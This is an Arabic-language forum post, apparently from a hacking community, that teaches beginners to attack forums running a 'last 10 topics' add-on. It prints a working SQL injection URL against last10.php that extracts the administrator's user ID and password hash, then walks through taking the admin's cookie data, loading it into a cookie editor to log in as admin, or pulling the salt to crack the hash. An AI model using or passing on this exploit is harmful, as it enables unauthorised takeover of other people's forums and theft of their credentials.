بسم الله الرحمن الرحيمطبعا كلنا عارفين ثغرة اخر عشر مواضيعومكتشفها المبدع اخوناالعندليب.وهي انك تطلع الباسوورد المشفر والسالت وتروحتكسره..الان مو شرط تكسره تقدر تدخل بعضويه الادمن عااديمثل ثغرات xss تاخذ الكوكيز.وهي من تطوير اخونا الغالي: كيفن العربتابعو الشرح:-كود الثغره لشريط عشر مواضيعكود:last10.php?ftitle=%20WHERE%20userid=0%20UNION%20SELECT%20null, userid, password, null, null, null, null, null, null%20FROM%20user%20WHERE%20usergroupid=6%20LIMIT%201/*طبعا خلونا نشرح للمبتدئين شرح دقيقlast10.php? = اسم شريط آخر عشر مواضيع..وكل منتدى يختلف من ناحيه اسماء الهاكات..طيب واحد يسألني كيف اعرف اسم الشريطاول شئ نروح للشريط ونضغط كلك يمينوخصائصشوف الصوره:- تابعوا الشرح...بعد ما طلعنا اسم شريط آخر عشر المواضيعنروح ونحط كود الثغره خلف رابط المنتدىشوف الصوره:- ومن ثم نضغط انتر....شوف اشنو يطلعلك:- طيب الان اخذنا اول بند من بنود الثغره القديمهوالان ندخل بالتطوير:-لو نلاحظ كود الثغره موجود كلمه Passwordيعني الباسوورد المشفرطيب اذا جربنا كلمه useird ??بيطلع رقم عضويه الادمن طبعا طيب نعدل على الكمهونكتب useird ونغير الكلمه المؤشر عليها مره اخرى تابع مبرووووك عليك بيانات الكوكيز الكاملهطيب الان نحتاج لبرنامج كوكيز ايدتور..موجود بالمنتدىونغير البيانات بالبيانات التي اخذناها من شريط اخر عشرمواضيعواخرج من جميع المتصفحات الي عندك شغالهوادخل المنتدى من جديدوسوف تشوف نفسك الادمن طبعا اذا ما كنت حاب تغير البياناتممكن تاخذ الباسوورد المشفروتغير الكلمه من password الى saltوتروح تكسره ومبروك عليك الاختراقاتمنى يكون واضحواذا في اي غموض بالشرحانا موجود